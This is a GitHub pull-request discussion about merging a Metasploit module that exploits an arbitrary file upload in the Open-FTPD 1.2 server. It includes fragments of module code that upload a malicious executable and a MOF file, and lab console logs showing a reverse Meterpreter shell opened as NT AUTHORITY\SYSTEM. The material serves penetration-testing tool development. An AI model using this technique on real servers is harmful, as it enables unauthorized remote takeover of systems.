Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Open-FTPD 1.2 Writable Directory Traversal Execution #2211

Merged
merged 1 commit into from Aug 12, 2013

Conversation

@bcoles
Copy link
Contributor

bcoles commented Aug 12, 2013

Add Open-FTPD 1.2 Writable Directory Traversal Execution

Homepage: http://sourceforge.net/projects/open-ftpd/
Tested on 1.2 (Windows XP SP3) (EN)

Open-FTPD 1.2 Writable Directory Traversal Execution

@jvazquez-r7

This comment has been minimized.

Copy link
Contributor

jvazquez-r7 commented Aug 12, 2013

Processing...

send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)

# Tell the FTP server to download our file
send_cmd(['STOR', filename], false, conn)

This comment has been minimized.

Copy link
@jvazquez-r7

jvazquez-r7 Aug 12, 2013

Contributor

According to the code, it looks like an arbitrary File Upload more than a directory traversal vulnerability, as written in the Name and Description of the module. Is it right or I'm forgetting something ?

Thanks!

This comment has been minimized.

Copy link
@bcoles

bcoles Aug 12, 2013

Author Contributor

You're correct. 'Arbitrary file upload' is more applicable.

This comment has been minimized.

Copy link
@jvazquez-r7

jvazquez-r7 Aug 12, 2013

Contributor

Awesome, in this case, fixing things by myself, and landing, are just minor changes, thanks @bcoles!

# Upload our malicious executable
u = upload(exe_name)
# Upload the mof file
upload(mof_name) if u

This comment has been minimized.

Copy link
@jvazquez-r7

jvazquez-r7 Aug 12, 2013

Contributor

According to the code, it looks like an arbitrary File Upload more than a directory traversal vulnerability, as written in the Name and Description of the module. Is it right or I'm forgetting something ?

Thanks!

include Msf::Exploit::FileDropper

def initialize(info={})
super(update_info(info,

This comment has been minimized.

Copy link
@jvazquez-r7

jvazquez-r7 Aug 12, 2013

Contributor

Please add the next option to the metadata:

'Stance'         => Msf::Exploit::Stance::Aggressive,

In this way the TcpServer will finish once the exploit finishes :). Even when you're using the TcpServer mixin here, it's an aggressive but not a passive exploit.

@jvazquez-r7

This comment has been minimized.

Copy link
Contributor

jvazquez-r7 commented Aug 12, 2013

Once comments are clarified by @bcoles it's ready to be landed:

msf exploit(open_ftpd_wbem) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Server started.
[*] 192.168.172.208:21 - Trying to upload bexsGiK.exe
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:50356 - Sending executable (73802 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.172.208:21 - Trying to upload BRhkiOcs.mof
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:50358 - Sending MOF (2190 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] Sending stage (751104 bytes) to 192.168.172.208
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.208:2481) at 2013-08-12 09:10:39 -0500
[+] Deleted wbem\mof\good\BRhkiOcs.mof

^C[-] Exploit failed: Interrupt 
[*] Server stopped.
[!] This exploit may require manual cleanup of: bexsGiK.exe

meterpreter > exit
[*] Shutting down Meterpreter...

jvazquez-r7 pushed a commit that referenced this pull request Aug 12, 2013
@jvazquez-r7 jvazquez-r7 merged commit d63d7bc into rapid7:master Aug 12, 2013
1 check passed
1 check passed
default The Travis CI build passed
Details
@jvazquez-r7

This comment has been minimized.

Copy link
Contributor

jvazquez-r7 commented Aug 12, 2013

Last changes here: 8ac01d3

Final test:

msf exploit(open_ftpd_wbem) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Server started.
[*] 192.168.172.208:21 - Trying to upload luguTktG.exe
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[*] 192.168.0.3:52338 - Sending executable (73802 bytes)
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.172.208:21 - Trying to upload rgzFGsEGKn.mof
[*] 192.168.172.208:21 - Set binary mode
[*] 192.168.172.208:21 - Set active mode "192,168,0,3,31,144"
[+] 192.168.172.208:21 - Upload successful
[*] 192.168.0.3:52340 - Sending MOF (2199 bytes)
[*] Sending stage (751104 bytes) to 192.168.172.208
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.208:1039) at 2013-08-12 11:18:55 -0500
[+] Deleted wbem\mof\good\rgzFGsEGKn.mof

^C[-] Exploit failed: Interrupt 
[*] Server stopped.
[!] This exploit may require manual cleanup of: luguTktG.exe

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
emeterpreter > exit
[*] Shutting down Meterpreter...

Thanks @bcoles !

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

2 participants
You can’t perform that action at this time.